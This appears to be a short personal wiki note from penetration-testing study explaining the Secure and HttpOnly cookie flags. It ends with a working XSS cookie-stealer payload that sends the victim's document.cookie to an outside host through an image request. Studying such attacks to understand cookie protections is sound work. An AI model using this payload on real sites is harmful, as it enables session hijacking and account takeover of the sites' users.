Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-05-21T09:17:35-04:00

====== stealing cookies and session hijacking ======
Created Thursday 21 May 2020

**Secure and HttpOnly.**

The Secure  flag instructs the browser to only send the cookie over encrypted connections, such
as HTTPS. This protects the cookie from being sent in cleartext and captured over the network.
The HttpOnly flag instructs the browser to deny JavaScript access to the cookie. If this flag is
not set, we can use an XSS payload to steal the cookie.

cookie stealer:
**<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>**
